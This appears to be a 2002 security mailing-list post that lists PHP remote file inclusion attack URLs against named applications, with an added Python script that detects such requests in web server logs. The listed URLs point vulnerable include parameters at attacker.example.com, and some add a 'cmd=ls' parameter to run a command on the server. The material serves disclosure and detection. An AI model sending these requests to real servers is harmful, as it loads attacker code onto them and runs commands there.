From: Steven M. Christey (coley_at_linus.mitre.org)
Date: Sat Sep 21 2002 - 17:46:16 CDT


    I used the regular expression in my previous post to grab some
    concrete PHP-related URLs from about 4 months' worth of email, which
    includes various security mailing lists. Many of these URLs come
    from a Bugtraq post by Frog Man in June.

    /_head.php?_zb_path=http://attacker.example.com
    /achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attacker.example.com?
    /gallery/captionator.php?GALLERY_BASEDIR=http://attacker.example.com
    /globals.php3?LangCookie=http://attacker.example.com
    /include/msql.php?inc_dir=http://attacker.example.com&ext=txt
    /include/mssql7.php?inc_dir=http://attacker.example.com&ext=txt
    /include/mysql.php?inc_dir=http://attacker.example.com&ext=txt
    /include/oci8.php?inc_dir=http://attacker.example.com&ext=txt
    /include/postgres.php?inc_dir=http://attacker.example.com&ext=txt
    /include/postgres65.php?inc_dir=http://attacker.example.com&ext=txt
    /install.php?phpbb_root_dir=http://attacker.example.com
    /mantis/login_page.php?g_meta_include_file=http://attacker.example.com
    /page.php?template=http://your-ip/hello.html?
    /phorum/admin/actions/del.php?include_path=http://attacker.example.com&cmd=ls
    /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://attacker.example.com&cmd=ls
    /pollensondage.inc.php?app_path=http://attacker.example.com
    /user/agora_user.php?inc_dir=http://attacker.example.com&ext=txt
    /user/ldap_example.php?inc_dir=http://attacker.example.com&ext=txt
    /userlist.php?ME=http://attacker.example.com

    - Steve

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
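
As an added example (not part of the original post, and not the regular expression the author refers to), the following defender-side check flags requests shaped like those listed above: a query parameter whose value is itself a remote URL, including percent-encoded variants. The Common Log Format input, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# A parameter value that is itself a remote URL is the trait shared by every
# request in the post. Legitimate redirect/URL parameters match too, so treat
# hits as leads to triage, not verdicts.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Request field of a Common Log Format line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decoded(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253A -> %3A -> :), bounded."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_include_params(target):
    """Return [(param, decoded_value)] where the value starts with a remote URL."""
    hits = []
    # parse_qsl performs the first round of percent-decoding.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decoded(value)
        if REMOTE_SCHEME.match(value):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Return [(line_number, path, param, value)] for suspicious requests."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        target = match.group("target") if match else ""
        for name, value in remote_include_params(target):
            findings.append((number, urlsplit(target).path, name, value))
    return findings

# Constructed sample log (paths from the post, clients from 192.0.2.0/24).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Sep/2002:17:40:01 -0500] "GET /index.php?page=news HTTP/1.0" 200 5120',
    '192.0.2.44 - - [21/Sep/2002:17:41:13 -0500] "GET /include/mysql.php?inc_dir=http://attacker.example.com&ext=txt HTTP/1.0" 200 312',
    '192.0.2.44 - - [21/Sep/2002:17:41:20 -0500] "GET /userlist.php?ME=http%3A%2F%2Fattacker.example.com HTTP/1.0" 200 298',
    '192.0.2.44 - - [21/Sep/2002:17:41:31 -0500] "GET /install.php?phpbb_root_dir=hTtP%253A//attacker.example.com HTTP/1.0" 404 210',
]
```

Calling `scan_log(SAMPLE_LOG)` reports lines 2 through 4 and skips the ordinary `page=news` request on line 1.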